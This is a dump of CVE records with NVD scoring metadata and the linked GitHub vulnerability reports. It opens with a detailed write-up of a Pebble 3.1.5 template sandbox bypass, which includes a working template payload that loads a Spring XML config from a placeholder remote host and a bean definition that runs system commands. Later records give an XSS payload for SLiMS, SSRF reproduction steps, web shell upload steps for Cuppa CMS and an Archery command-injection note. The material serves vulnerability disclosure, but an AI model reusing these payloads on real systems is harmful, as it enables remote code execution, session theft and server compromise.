"Y4tacker",
"Web-Security"
] | # Pebble 3.1.5 Bypass
Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springboot.
First, simply set up an environment with the official documentation:https://pebbletemplates.io/
Pom.xml
```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>hackingpebble</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>hackingpebble</name>
<description>hackingpebble</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>io.pebbletemplates</groupId>
<artifactId>pebble-spring-boot-starter</artifactId>
<version>3.1.5</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
```
com.example.hackingpebble.HackingpebbleApplication.java
```java
package com.example.hackingpebble;
import com.mitchellbosecke.pebble.PebbleEngine;
import com.mitchellbosecke.pebble.loader.Loader;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
@SpringBootApplication
public class HackingpebbleApplication {
public static void main(String[] args) {
SpringApplication.run(HackingpebbleApplication.class, args);
}
}
```
com.example.hackingpebble.controller.Test.java
```java
package com.example.hackingpebble.controller;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
@Controller
public class Test {
@RequestMapping({"/"})
public String getTemplate(@RequestParam String template) {
return template;
}
}
```
application.properties
```java
pebble.prefix = templates
pebble.suffix = .pebble
```
And file structure as follows:
<img width="840" alt="2022-08-03 20 57 15" src="https://user-images.githubusercontent.com/56486273/182613443-8dc02374-35f8-428a-94e7-33ecf5b19087.png">
When we control the parameter template we can render back the specified template file.
In previous versions, in order to mitigate command execution caused by malicious content in the template,pebble introduces a new security mechanism, which is implemented through the class BlacklistMethodAccessValidator.
In this class you can see a lot of restrictions, on the one hand, restricting the class to be an instance of certain classes, and on the other hand, restricting the execution of some methods
```java
public class BlacklistMethodAccessValidator implements MethodAccessValidator {
private static final String[] FORBIDDEN_METHODS = new String[]{"getClass", "wait", "notify", "notifyAll"};
public BlacklistMethodAccessValidator() {
}
public boolean isMethodAccessAllowed(Object object, Method method) {
boolean methodForbidden = object instanceof Class || object instanceof Runtime || object instanceof Thread || object instanceof ThreadGroup || object instanceof System || object instanceof AccessibleObject || this.isUnsafeMethod(method);
return !methodForbidden;
}
private boolean isUnsafeMethod(Method member) {
return this.isAnyOfMethods(member, FORBIDDEN_METHODS);
}
private boolean isAnyOfMethods(Method member, String... methods) {
String[] var3 = methods;
int var4 = methods.length;
for(int var5 = 0; var5 < var4; ++var5) {
String method = var3[var5];
if (this.isMethodWithName(member, method)) {
return true;
}
}
return false;
}
private boolean isMethodWithName(Method member, String method) {
return member.getName().equals(method);
}
}
```
Look at the old version of exploit, loading any class by Class.forName,now,no class
```java
{% set cmd = 'id' %}
{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
.invoke(null,null)
.exec(cmd) %}
```
What can we do? So far we know that many instances of Spring applications are implicitly registered as beans, so can we find an object from a bean that holds a classloader object, and by getting it we can load any object by executing loadClass
By debugging we can easily export these beans objects
<img width="1261" alt="1" src="https://user-images.githubusercontent.com/56486273/182612181-b21c98e1-b586-4c02-a0b6-d8c863a76a22.png">
So we have to find some eligible beans among these classes
```java
org.springframework.context.annotation.internalConfigurationAnnotationProcessor
org.springframework.context.annotation.internalAutowiredAnnotationProcessor
org.springframework.context.annotation.internalCommonAnnotationProcessor
org.springframework.context.event.internalEventListenerProcessor
org.springframework.context.event.internalEventListenerFactory
hackingpebbleApplication
org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory
test
org.springframework.boot.autoconfigure.AutoConfigurationPackages
org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration
propertySourcesPlaceholderConfigurer
org.springframework.boot.autoconfigure.websocket.servlet.WebSocketServletAutoConfiguration$TomcatWebSocketConfiguration
websocketServletWebServerCustomizer
org.springframework.boot.autoconfigure.websocket.servlet.WebSocketServletAutoConfiguration
org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryConfiguration$EmbeddedTomcat
tomcatServletWebServerFactory
org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryAutoConfiguration
servletWebServerFactoryCustomizer
tomcatServletWebServerFactoryCustomizer
org.springframework.boot.context.properties.ConfigurationPropertiesBindingPostProcessor
org.springframework.boot.context.internalConfigurationPropertiesBinderFactory
org.springframework.boot.context.internalConfigurationPropertiesBinder
org.springframework.boot.context.properties.BoundConfigurationProperties
org.springframework.boot.context.properties.EnableConfigurationPropertiesRegistrar.methodValidationExcludeFilter
server-org.springframework.boot.autoconfigure.web.ServerProperties
webServerFactoryCustomizerBeanPostProcessor
errorPageRegistrarBeanPostProcessor
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration$DispatcherServletConfiguration
dispatcherServlet
spring.mvc-org.springframework.boot.autoconfigure.web.servlet.WebMvcProperties
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration$DispatcherServletRegistrationConfiguration
dispatcherServletRegistration
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration
org.springframework.boot.autoconfigure.task.TaskExecutionAutoConfiguration
taskExecutorBuilder
applicationTaskExecutor
spring.task.execution-org.springframework.boot.autoconfigure.task.TaskExecutionProperties
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration$WhitelabelErrorViewConfiguration
error
beanNameViewResolver
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration$DefaultErrorViewResolverConfiguration
conventionErrorViewResolver
spring.web-org.springframework.boot.autoconfigure.web.WebProperties
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration
errorAttributes
basicErrorController
errorPageCustomizer
preserveErrorControllerTargetClassPostProcessor
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration$EnableWebMvcConfiguration
requestMappingHandlerAdapter
welcomePageHandlerMapping
localeResolver
themeResolver
flashMapManager
mvcConversionService
mvcValidator
mvcContentNegotiationManager
requestMappingHandlerMapping
mvcPatternParser
mvcUrlPathHelper
mvcPathMatcher
viewControllerHandlerMapping
beanNameHandlerMapping
routerFunctionMapping
resourceHandlerMapping
mvcResourceUrlProvider
defaultServletHandlerMapping
handlerFunctionAdapter
mvcUriComponentsContributor
httpRequestHandlerAdapter
simpleControllerHandlerAdapter
handlerExceptionResolver
mvcViewResolver
mvcHandlerMappingIntrospector
viewNameTranslator
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter
defaultViewResolver
viewResolver
requestContextFilter
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration
formContentFilter
com.mitchellbosecke.pebble.boot.autoconfigure.PebbleServletWebConfiguration
pebbleViewResolver
com.mitchellbosecke.pebble.boot.autoconfigure.PebbleAutoConfiguration
pebbleLoader
springExtension
pebbleEngine
pebble-com.mitchellbosecke.pebble.boot.autoconfigure.PebbleProperties
org.springframework.boot.autoconfigure.jmx.JmxAutoConfiguration
mbeanExporter
objectNamingStrategy
mbeanServer
spring.jmx-org.springframework.boot.autoconfigure.jmx.JmxProperties
org.springframework.boot.autoconfigure.admin.SpringApplicationAdminJmxAutoConfiguration
springApplicationAdminRegistrar
org.springframework.boot.autoconfigure.aop.AopAutoConfiguration$ClassProxyingConfiguration
forceAutoProxyCreatorToUseClassProxying
org.springframework.boot.autoconfigure.aop.AopAutoConfiguration
org.springframework.boot.autoconfigure.availability.ApplicationAvailabilityAutoConfiguration
applicationAvailability
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$Jackson2ObjectMapperBuilderCustomizerConfiguration
standardJacksonObjectMapperBuilderCustomizer
spring.jackson-org.springframework.boot.autoconfigure.jackson.JacksonProperties
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$JacksonObjectMapperBuilderConfiguration
jacksonObjectMapperBuilder
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$ParameterNamesModuleConfiguration
parameterNamesModule
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$JacksonObjectMapperConfiguration
jacksonObjectMapper
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration
jsonComponentModule
jsonMixinModule
org.springframework.boot.autoconfigure.context.ConfigurationPropertiesAutoConfiguration
org.springframework.boot.autoconfigure.context.LifecycleAutoConfiguration
lifecycleProcessor
spring.lifecycle-org.springframework.boot.autoconfigure.context.LifecycleProperties
org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration$StringHttpMessageConverterConfiguration
stringHttpMessageConverter
org.springframework.boot.autoconfigure.http.JacksonHttpMessageConvertersConfiguration$MappingJackson2HttpMessageConverterConfiguration
mappingJackson2HttpMessageConverter
org.springframework.boot.autoconfigure.http.JacksonHttpMessageConvertersConfiguration
org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration
messageConverters
org.springframework.boot.autoconfigure.info.ProjectInfoAutoConfiguration
spring.info-org.springframework.boot.autoconfigure.info.ProjectInfoProperties
org.springframework.boot.autoconfigure.sql.init.SqlInitializationAutoConfiguration
spring.sql.init-org.springframework.boot.autoconfigure.sql.init.SqlInitializationProperties
org.springframework.boot.sql.init.dependency.DatabaseInitializationDependencyConfigurer$DependsOnDatabaseInitializationPostProcessor
org.springframework.boot.autoconfigure.task.TaskSchedulingAutoConfiguration
scheduledBeanLazyInitializationExcludeFilter
taskSchedulerBuilder
spring.task.scheduling-org.springframework.boot.autoconfigure.task.TaskSchedulingProperties
org.springframework.boot.autoconfigure.web.client.RestTemplateAutoConfiguration
restTemplateBuilderConfigurer
restTemplateBuilder
org.springframework.boot.autoconfigure.web.embedded.EmbeddedWebServerFactoryCustomizerAutoConfiguration$TomcatWebServerFactoryCustomizerConfiguration
tomcatWebServerFactoryCustomizer
org.springframework.boot.autoconfigure.web.embedded.EmbeddedWebServerFactoryCustomizerAutoConfiguration
org.springframework.boot.autoconfigure.web.servlet.HttpEncodingAutoConfiguration
characterEncodingFilter
localeCharsetMappingsCustomizer
org.springframework.boot.autoconfigure.web.servlet.MultipartAutoConfiguration
multipartConfigElement
multipartResolver
spring.servlet.multipart-org.springframework.boot.autoconfigure.web.servlet.MultipartProperties
org.springframework.aop.config.internalAutoProxyCreator
```
Fortunately we quickly found a class that fit the criteria and it helped us get the classloader object
<img width="521" alt="2" src="https://user-images.githubusercontent.com/56486273/182612219-ec75b2f6-77b1-43cd-ab16-4f459aeba184.png">
It is not enough to execute loadclass, we also need to instantiate the class. And It's also very simple, there is jackson among spring's dependencies, through jackson deserialization we can easily instantiate a class.
Fortunately there is this jacksonObjectMapper object in the beans.Now we can instantiate arbitrary classes, and by being able to instantiate arbitrary classes we have bypassed the filtering restrictions
In the spring scenario we can easily think of a configuration class org.springframework.context.support.ClassPathXmlApplicationContext, which allows us to load a remote xml configuration file, through which we can easily implement the command execution.
But...
At this point you will find that any class jackson that inherits from AbstractPointcutAdvisor and AbstractApplicationContext will not be allowed to instantiate
```java
public void validateSubType(DeserializationContext ctxt, JavaType type, BeanDescription beanDesc) throws JsonMappingException {
Class<?> raw = type.getRawClass();
String full = raw.getName();
if (!this._cfgIllegalClassNames.contains(full)) {
if (raw.isInterface()) {
return;
}
if (full.startsWith("org.springframework.")) {
Class cls = raw;
while(true) {
if (cls == null || cls == Object.class) {
return;
}
String name = cls.getSimpleName();
if ("AbstractPointcutAdvisor".equals(name) || "AbstractApplicationContext".equals(name)) {
break;
}
cls = cls.getSuperclass();
}
} else if (!full.startsWith("com.mchange.v2.c3p0.") || !full.endsWith("DataSource")) {
return;
}
}
ctxt.reportBadTypeDefinition(beanDesc, "Illegal type (%s) to deserialize: prevented for security reasons", new Object[]{full});
}
```
What to do at this time? We found a class called java.beans.Beans in jre.
The instantiate method of this class can help us instantiate arbitrary methods.
```java
public static Object instantiate(ClassLoader cls, String beanName) throws IOException, ClassNotFoundException {
return Beans.instantiate(cls, beanName, null, null);
}
```
Here the classloader parameter is allowed to be set to empty, if it is empty later will be through the ClassLoader.getSystemClassLoader (); get, of course, in fact, we also get a classloader at the top which is not the point,It will eventually return an instantiated object based on the beanName passed in.
```java
if (result == null) {
// No serialized object, try just instantiating the class
Class<?> cl;
try {
cl = ClassFinder.findClass(beanName, cls);
} catch (ClassNotFoundException ex) {
// There is no appropriate class. If we earlier tried to
// deserialize an object and got an IO exception, throw that,
// otherwise rethrow the ClassNotFoundException.
if (serex != null) {
throw serex;
}
throw ex;
}
if (!Modifier.isPublic(cl.getModifiers())) {
throw new ClassNotFoundException("" + cl + " : no public access");
}
/*
* Try to instantiate the class.
*/
try {
result = cl.newInstance();
} catch (Exception ex) {
// We have to remap the exception to one in our signature.
// But we pass extra information in the detail message.
throw new ClassNotFoundException("" + cl + " : " + ex, ex);
}
}
```
So we get the ClassPathXmlApplicationContext class that was forbidden to be instantiated by indirect means.
So by stringing these points together we can easily get the following payload
```java
{% set y= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %}
{% set yy = beans.get("jacksonObjectMapper").readValue("{}", y) %}
{% set yyy = yy.instantiate(null,"org.springframework.context.support.ClassPathXmlApplicationContext") %}
{{ yyy.setConfigLocation("http://xxx.xxx.xxx/1.xml") }}
{{ yyy.refresh() }}
```
1.xml
```xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>open</value>
<value>-a</value>
<value>calculator</value>
</list>
</constructor-arg>
</bean>
</beans>
```
with http server in your vps
```
python3 -m http.server 80
```
Successfully triggered command execution by template file called rce.pebble
<img width="606" alt="3" src="https://user-images.githubusercontent.com/56486273/182613215-94d98d05-3f5c-4dee-87e4-445dd60c2d2c.png">
| command execution vulnerability in pebble 3.1.5(latest) | https://api.github.com/repos/Y4tacker/Web-Security/issues/3/comments | 0 | 2022-08-03T12:51:58Z | 2022-09-20T01:19:30Z | https://github.com/Y4tacker/Web-Security/issues/3 | 1,327,173,676 | 3 | 4,125 |
CVE-2022-38291 | 2022-09-12T21:15:11.143 | SLiMS Senayan Library Management System v9.4.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the Search function. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search bar. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/slims/slims9_bulian/issues/156"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/slims/slims9_bulian/issues/156"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/slims/slims9_bulian/issues/156 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"slims",
"slims9_bulian"
] | **Describe the bug**
XSS in search bar
**To Reproduce**
Steps to reproduce the behavior:
1. Go to the website and make sure it has more than 10 bibliography/books
2. put this payload (`<IMG SRC="jav&x09;ascript:alert('XSS');"><script>alert("xss by 0xdc9");</script>`) in the search bar and enter
3. an alert that said "xss_by_0xdc9" should pops
**Screenshots**
<img width="1440" alt="Screen Shot 2022-08-10 at 01 35 40" src="https://user-images.githubusercontent.com/46653986/183736842-e3d69a1c-8a89-4f27-88ac-c21f0a075b51.png">
<img width="1440" alt="Screen Shot 2022-08-10 at 02 23 15" src="https://user-images.githubusercontent.com/46653986/183744266-c064d591-63ce-487e-ac69-fb5300f81196.png">
**Desktop:**
- OS: MacOS Mojave 10.14.6
- Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64)
- Slims Version: slims9_bulian-9.4.2
| XSS in search bar | https://api.github.com/repos/slims/slims9_bulian/issues/156/comments | 0 | 2022-08-09T18:44:51Z | 2022-09-24T03:27:21Z | https://github.com/slims/slims9_bulian/issues/156 | 1,333,651,959 | 156 | 4,126 |
CVE-2022-38292 | 2022-09-12T21:15:11.193 | SLiMS Senayan Library Management System v9.4.2 was discovered to contain multiple Server-Side Request Forgeries via the components /bibliography/marcsru.php and /bibliography/z3950sru.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/slims/slims9_bulian/issues/158"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/slims/slims9_bulian/issues/158"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"918"
] | 918 | https://github.com/slims/slims9_bulian/issues/158 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"slims",
"slims9_bulian"
] | **The bug**
A Server Side Request Forgery exists in `admin/modules/bibliography/marcsru.php` and `admin/modules/bibliography/z3950sru.php` due to the class in `lib/marc/XMLParser.inc.php`
**Reproduce**
Steps to reproduce the behavior:
1. Go to `http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography` then go to copy cataloguing
2. choose between marc sru or 23950sru
3. type in something what you want in the search bar
4. set burpsuite intercept on
5. change the `z3950_SRU_source` or `marc_SRU_source` parameter value to some url that grab the traffic
6. forward the request
7. or just visit `http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN`
**Screenshots**
Normal requests
<img width="1435" alt="Screen Shot 2022-08-12 at 04 11 39" src="https://user-images.githubusercontent.com/46653986/184243053-ddf2bf58-051e-4c45-8873-c573c2ce7394.png">
Tampered and SSRF trigger(netcat)
<img width="1438" alt="Screen Shot 2022-08-12 at 04 13 21" src="https://user-images.githubusercontent.com/46653986/184243621-ca8f82af-4a18-4abe-8ef4-c69e51c8a60d.png">
Tampered and SSRF trigger(toptal.com)
<img width="1440" alt="Screen Shot 2022-08-12 at 04 22 25" src="https://user-images.githubusercontent.com/46653986/184244902-e9df9ed5-7c03-4c0b-bdf9-a58312c3cf67.png">
**Versions**
- OS: MacOS Mojave 10.14.6
- Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64)
- Slims Version: slims9_bulian-9.4.2 | [Security Bugs] Server Side Request Forgery | https://api.github.com/repos/slims/slims9_bulian/issues/158/comments | 0 | 2022-08-11T21:31:20Z | 2022-11-24T07:56:26Z | https://github.com/slims/slims9_bulian/issues/158 | 1,336,516,748 | 158 | 4,127 |
CVE-2022-38295 | 2022-09-12T21:15:11.243 | Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/34"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/34"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/CuppaCMS/CuppaCMS/issues/34 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | Cross-Site Scripting exists in Cuppa CMS in Users tap.
Discoverer : **Team Am0namiss**(Members : [hoseongJ](https://github.com/hoseongJ), [studdcat](https://github.com/studdcat), [AnonyMousStu](https://github.com/AnonyMousStu), [GuJiseung](https://github.com/GuJiseung), [4dministrat0r](https://github.com/4dministrat0r))
link : http://localhost/cuppa/#/component/table_manager/view/cu_user_groups

- Users -> User groups -> Add User group

- Write scripts in "Name" field and click "Save" button

- Check script execution | XSS Vulnerability exists in Cuppa CMS in Users | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/34/comments | 0 | 2022-08-09T12:30:41Z | 2022-09-13T11:02:46Z | https://github.com/CuppaCMS/CuppaCMS/issues/34 | 1,333,188,097 | 34 | 4,128 |
CVE-2022-38296 | 2022-09-12T21:15:11.297 | Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/33"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/33"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/CuppaCMS/CuppaCMS/issues/33 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | File upload vulnerability exists in Cuppa CMS in File Manager tap.
Discoverer : **Team Am0namiss**(Members : [hoseongJ](https://github.com/hoseongJ), [studdcat](https://github.com/studdcat), [AnonyMousStu](https://github.com/AnonyMousStu), [GuJiseung](https://github.com/GuJiseung), [4dministrat0r](https://github.com/4dministrat0r))
link : http://localhost/cuppa/media/attack.php (WebShell URL)



- Click "rename" check in BurpSuite. And rename in BurpSuite.

- Click "show URL" button and copy URL.

- Run Web Shell in Cuppa CMS | File Upload Vulnerability exists in Cuppa CMS in File Manager | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/33/comments | 0 | 2022-08-09T12:17:02Z | 2022-09-13T11:02:31Z | https://github.com/CuppaCMS/CuppaCMS/issues/33 | 1,333,171,744 | 33 | 4,129 |
CVE-2022-38537 | 2022-09-13T15:15:08.973 | Archery v1.4.5 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_file, end_file, start_time, and stop_time parameters in the binlog2sql interface. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://announcements.bybit.com/en-US/article/bybit-improves-the-security-of-the-open-source-community-blt626818c0ee8c48a6/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hhyo/Archery/blob/v1.8.5/sql/urls.py#L135"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/hhyo/Archery/issues/1842"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://announcements.bybit.com/en-US/article/bybit-improves-the-security-of-the-open-source-community-blt626818c0ee8c48a6/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hhyo/Archery/blob/v1.8.5/sql/urls.py#L135"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/hhyo/Archery/issues/1842"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:archerydms:archery:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F38198C3-79F6-4978-8227-0D784F625903",
"versionEndExcluding": "1.9.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.4.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/hhyo/Archery/issues/1842 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"hhyo",
"Archery"
] | ### 重现步骤
https://github.com/hhyo/Archery/blob/v1.8.5/sql/plugins/my2sql.py#L36
Plugin my2sql has a problem with the filtering method of start_time and stop_time parameters, which leads to injection system command execution, resulting in a remote command execution vulnerability.
